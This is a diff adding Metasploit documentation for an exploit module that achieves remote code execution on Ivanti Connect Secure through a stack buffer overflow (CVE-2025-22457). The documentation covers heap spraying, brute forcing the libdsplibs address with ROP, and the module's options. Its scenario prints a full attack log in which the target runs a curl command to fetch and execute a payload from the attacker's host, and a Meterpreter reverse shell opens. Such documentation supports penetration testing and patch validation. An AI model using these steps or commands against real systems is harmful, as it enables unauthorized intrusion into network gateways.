|
| 1 | +## Vulnerable Application |
| 2 | + |
| 3 | +This module exploits a Stack-based Buffer Overflow vulnerability in Ivanti |
| 4 | +Connect Secure to achieve remote code execution (CVE-2025-22457). Versions |
| 5 | +22.7R2.5 and earlier are vulnerable. Note that Ivanti Pulse Connect Secure, |
| 6 | +Ivanti Policy Secure and ZTA gateways are also vulnerable but this module |
| 7 | +doesn't support this software. Heap spray is used to place our payload in |
| 8 | +memory at a predetermined location. Due to ASLR, the base address of |
| 9 | +`libdsplibs` is unknown. This library is used by the exploit to build a ROP |
| 10 | +chain and get command execution. As a result, the module will brute force this |
| 11 | +address starting from the address set by the `LIBDSPLIBS_ADDRESS` option. |
| 12 | + |
| 13 | +Since this module needs to fill the processes memory with a large structure |
| 14 | +using the heap spray technique, it might take a very long time to succeed. The |
| 15 | +execution can be tweeked with the options described below. |
| 16 | + |
| 17 | +Also, since this will create many sockets on your system, you might need to |
| 18 | +increase the file descriptor limit with `ulimit` (e.g. `ulimit -n 65535`). |
| 19 | + |
| 20 | +### Installation Steps |
| 21 | +Get an Ivanti Security Appliance (ISA) or a Virtual Appliances (ISA-V Series) |
| 22 | +with a vulnerable Ivanti Connect Secure installed. |
| 23 | + |
| 24 | +Note that it is not possible to download a trial version of a Virtual Appliance |
| 25 | +unless you contact sales and request a demo. |
| 26 | + |
| 27 | +## Verification Steps |
| 28 | +1. Start msfconsole |
| 29 | +1. Do: `use linux/http/ivanti_connect_secure_stack_overflow_rce_cve_2025_22457` |
| 30 | +1. Do: `exploit verbose=true lhost=<local host> rhosts=<remote host>` |
| 31 | +1. You should get a Meterpreter session |
| 32 | + |
| 33 | + |
| 34 | +## Options |
| 35 | + |
| 36 | +### MAX_THREADS |
| 37 | +The maximum number of threads to use when spraying (default: 32) |
| 38 | + |
| 39 | +### WEB_CHILDREN |
| 40 | +The number of `/home/bin/web` child processes the server uses. It's been |
| 41 | +observed that the number of children the main process forks is directly related |
| 42 | +to the number of vCPUs used by the system. Ivanti recommends having 4 vCPUs, so |
| 43 | +the default number of children is set to 4. |
| 44 | + |
| 45 | +### LIBDSPLIBS_ADDRESS |
| 46 | +The base address of libdsplibs that the module will start with when brute |
| 47 | +forcing. It has been observed that this address is always in the range of |
| 48 | +`0xf6525000`-`0xf6426000`, giving 256 possible options, since the alignment is |
| 49 | +4KB (0x1000 bytes) bytes. As a result, the default value has been set to |
| 50 | +`0xf6426000`. |
| 51 | + |
| 52 | +### BRUTEFORCE_ATTEMPTS |
| 53 | +The number of attempts to brute force the base address of libdsplibs (default: 255). |
| 54 | + |
| 55 | + |
| 56 | +## Scenarios |
| 57 | + |
| 58 | +### Ivanti Connect Secure version 22.7r2.4 b3597 |
| 59 | + |
| 60 | +In this example, the address of libdsplibs is known to speed up the process (0xf64c1000). Also, we know the target system runs with 2 vCPU's. |
| 61 | + |
| 62 | +``` |
| 63 | +msf6 exploit(linux/http/ivanti_connect_secure_stack_overflow_rce_cve_2025_22457) > exploit verbose=true lhost=192.168.222.97 rhosts=192.168.222.222 libdsplibs_address=0xf64c1000 web_children=2 |
| 64 | +[*] Command to run on remote host: curl -so ./pbPNUixqDiK http://192.168.222.97:8080/QAeBnT-6WHJiW5MJjwMrfA;chmod +x ./pbPNUixqDiK;./pbPNUixqDiK& |
| 65 | +[*] Fetch handler listening on 192.168.222.97:8080 |
| 66 | +[*] HTTP server started |
| 67 | +[*] Adding resource /QAeBnT-6WHJiW5MJjwMrfA |
| 68 | +[*] Started reverse TCP handler on 192.168.222.97:4444 |
| 69 | +[*] 192.168.222.222:443 - Running automatic check ("set AutoCheck false" to disable) |
| 70 | +[*] 192.168.222.222:443 - Checking the product version for https://192.168.222.222:443 |
| 71 | +[+] 192.168.222.222:443 - The target appears to be vulnerable. Detected version: 22.7.2.3597 |
| 72 | +[*] 192.168.222.222:443 - shell_cmd: a;export LD_LIBRARY_PATH=/home/lib;curl -so ./pbPNUixqDiK http://192.168.222.97:8080/QAeBnT-6WHJiW5MJjwMrfA;chmod +x ./pbPNUixqDiK;./pbPNUixqDiK& #BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB |
| 73 | +[*] 192.168.222.222:443 - Targeting https://192.168.222.222:443 |
| 74 | +[*] 192.168.222.222:443 - Starting... |
| 75 | +[*] 192.168.222.222:443 - Trying libdsplibs.so @ 0xf64c1000 |
| 76 | +[*] 192.168.222.222:443 - Making connections... |
| 77 | +[*] 192.168.222.222:443 - Spraying... |
| 78 | +[*] 192.168.222.222:443 - Triggering... |
| 79 | +[*] 192.168.222.222:443 - Attempt #1 |
| 80 | +[*] 192.168.222.222:443 - Attempt #2 |
| 81 | +[*] Client 192.168.222.222 requested /QAeBnT-6WHJiW5MJjwMrfA |
| 82 | +[*] Sending payload to 192.168.222.222 (curl/7.80.0-DEV) |
| 83 | +[*] Meterpreter session 1 opened (192.168.222.97:4444 -> 192.168.222.222:16758) at 2025-04-30 21:36:49 +0200 |
| 84 | +[!] 192.168.222.222:443 - Exception: The connection with (192.168.222.222:443) timed out. |
| 85 | +[*] 192.168.222.222:443 - Attempt elapsed time: 222.46986142301466 seconds |
| 86 | +[*] 192.168.222.222:443 - Total elapsed time: 227.48146175200236 seconds |
| 87 | +
|
| 88 | +meterpreter > sysinfo |
| 89 | +Computer : 192.168.222.222 |
| 90 | +OS : CentOS 7.9.2009 (Linux 4.17.00.35-selinux-jailing-production) |
| 91 | +Architecture : x64 |
| 92 | +BuildTuple : x86_64-linux-musl |
| 93 | +Meterpreter : x64/linux |
| 94 | +meterpreter > getuid |
| 95 | +Server username: nr |
| 96 | +``` |
0 commit comments